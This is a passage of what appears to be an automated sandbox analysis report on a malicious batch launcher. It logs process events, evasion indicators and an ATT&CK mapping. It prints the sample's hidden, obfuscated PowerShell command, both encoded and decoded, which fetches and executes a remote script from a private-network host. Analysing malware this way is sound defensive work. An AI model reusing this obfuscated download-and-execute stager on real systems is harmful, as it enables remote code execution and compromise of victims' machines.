bAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF7C7EB00BD pushad ; iretd 2_2_00007FF7C7EB00C1
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5003Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4829Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep count: 5003 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep count: 4829 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -10145709240540247s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000002.00000002.1512483621.00000223BDEC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=
    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded .("{2}{1}{0}"-f 'E','Iabl','SEt-VaR') ('T'+'3SZP1') ( [Type]("{0}{1}{2}{3}{4}"-f'N','eT','.CRedEntIaL','c','AChe') ) ; (&("{2}{1}{0}" -f't','c','New-Obje') ("{2}{3}{1}{0}"-f 't','n','Net','.WebClie'))."PRO`Xy"."cReD`eNTi`A`ls"= ( &("{0}{1}"-f 'it','eM') ("VARIAb"+"L"+"E:T"+"3szP"+"1") )."vaL`Ue"::"d`EfaULtnEtWORK`c`Re`DEntIaLS";&("{1}{0}"-f 'r','iw')(("{2}{8}{4}{9}{1}{3}{7}{0}{5}{6}"-f'oad/power','.12','http://','8:8080/','2','shell','/','downl','19','.168.101'))-UseBasicParsing|&("{1}{0}"-f'x','ie')
    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded .("{2}{1}{0}"-f 'E','Iabl','SEt-VaR') ('T'+'3SZP1') ( [Type]("{0}{1}{2}{3}{4}"-f'N','eT','.CRedEntIaL','c','AChe') ) ; (&("{2}{1}{0}" -f't','c','New-Obje') ("{2}{3}{1}{0}"-f 't','n','Net','.WebClie'))."PRO`Xy"."cReD`eNTi`A`ls"= ( &("{0}{1}"-f 'it','eM') ("VARIAb"+"L"+"E:T"+"3szP"+"1") )."vaL`Ue"::"d`EfaULtnEtWORK`c`Re`DEntIaLS";&("{1}{0}"-f 'r','iw')(("{2}{8}{4}{9}{1}{3}{7}{0}{5}{6}"-f'oad/power','.12','http://','8:8080/','2','shell','/','downl','19','.168.101'))-UseBasicParsing|&("{1}{0}"-f'x','ie')Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -nop -w 1 -ep bypass -enc iaagac4akaaiahsamgb9ahsamqb9ahsamab9acialqbmacaajwbfaccalaanaekayqbiagwajwasaccauwbfahqalqbwageauganackaiaagacgajwbuaccakwanadmauwbaafaamqanackaiaagacgaiabbafqaeqbwaguaxqaoaciaewawah0aewaxah0aewayah0aewazah0aewa0ah0aigatagyajwboaccalaanaguavaanacwajwauaemaugblagqarqbuahqasqbhaewajwasaccaywanacwajwbbaemaaablaccakqagacaakqagadsaiaagacgajgaoaciaewayah0aewaxah0aewawah0aigagac0azganahqajwasaccaywanacwajwboaguadwatae8aygbqaguajwapacaakaaiahsamgb9ahsamwb9ahsamqb9ahsamab9acialqbmacaajwb0accalaanag4ajwasaccatgblahqajwasaccalgbxaguaygbdagwaaqblaccakqapac4aigbqafiatwbgafgaeqaiac4aigbjafiazqbeagaazqboafqaaqbgaeeayabsahmaiga9acaaiaaoacaaiaamacgaigb7adaafqb7adeafqaiac0azgagaccaaqb0accalaanaguatqanackaiaagacgaigbwaeeaugbjaeeaygaiacsaigbmaciakwaiaeuaogbuaciakwaiadmacwb6afaaigaraciamqaiackaiaapac4aigb2ageatabgafuazqaiadoaogaiagqayabfagyayqbvaewadabuaeuadabxae8augblagaaywbgafiazqbgaeqarqbuahqasqbhaewauwaiadsajgaoaciaewaxah0aewawah0aigatagyaiaanahiajwasaccaaqb3accakqaoacgaigb7adiafqb7adgafqb7adqafqb7adkafqb7adeafqb7admafqb7adcafqb7adaafqb7aduafqb7adyafqaiac0azganag8ayqbkac8acabvahcazqbyaccalaanac4amqayaccalaanaggadab0ahaaogavac8ajwasaccaoaa6adgamaa4adaalwanacwajwayaccalaanahmaaablagwabaanacwajwavaccalaanagqabwb3ag4abaanacwajwaxadkajwasaccalgaxadyaoaauadeamaaxaccakqapac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcafaamacgaigb7adeafqb7adaafqaiac0azganahgajwasaccaaqblaccakqa=
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -nop -w 1 -ep bypass -enc iaagac4akaaiahsamgb9ahsamqb9ahsamab9acialqbmacaajwbfaccalaanaekayqbiagwajwasaccauwbfahqalqbwageauganackaiaagacgajwbuaccakwanadmauwbaafaamqanackaiaagacgaiabbafqaeqbwaguaxqaoaciaewawah0aewaxah0aewayah0aewazah0aewa0ah0aigatagyajwboaccalaanaguavaanacwajwauaemaugblagqarqbuahqasqbhaewajwasaccaywanacwajwbbaemaaablaccakqagacaakqagadsaiaagacgajgaoaciaewayah0aewaxah0aewawah0aigagac0azganahqajwasaccaywanacwajwboaguadwatae8aygbqaguajwapacaakaaiahsamgb9ahsamwb9ahsamqb9ahsamab9acialqbmacaajwb0accalaanag4ajwasaccatgblahqajwasaccalgbxaguaygbdagwaaqblaccakqapac4aigbqafiatwbgafgaeqaiac4aigbjafiazqbeagaazqboafqaaqbgaeeayabsahmaiga9acaaiaaoacaaiaamacgaigb7adaafqb7adeafqaiac0azgagaccaaqb0accalaanaguatqanackaiaagacgaigbwaeeaugbjaeeaygaiacsaigbmaciakwaiaeuaogbuaciakwaiadmacwb6afaaigaraciamqaiackaiaapac4aigb2ageatabgafuazqaiadoaogaiagqayabfagyayqbvaewadabuaeuadabxae8augblagaaywbgafiazqbgaeqarqbuahqasqbhaewauwaiadsajgaoaciaewaxah0aewawah0aigatagyaiaanahiajwasaccaaqb3accakqaoacgaigb7adiafqb7adgafqb7adqafqb7adkafqb7adeafqb7admafqb7adcafqb7adaafqb7aduafqb7adyafqaiac0azganag8ayqbkac8acabvahcazqbyaccalaanac4amqayaccalaanaggadab0ahaaogavac8ajwasaccaoaa6adgamaa4adaalwanacwajwayaccalaanahmaaablagwabaanacwajwavaccalaanagqabwb3ag4abaanacwajwaxadkajwasaccalgaxadyaoaauadeamaaxaccakqapac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcafaamacgaigb7adeafqb7adaafqaiac0azganahgajwasaccaaqblaccakqa=Jump to behavior

    Language, Device and Operating System Detection

    barindex
    Source: Yara matchFile source: launcher (1).bat, type: SAMPLE
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting    		Valid Accounts1
    Command and Scripting Interpreter    		1
    Scripting    		11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
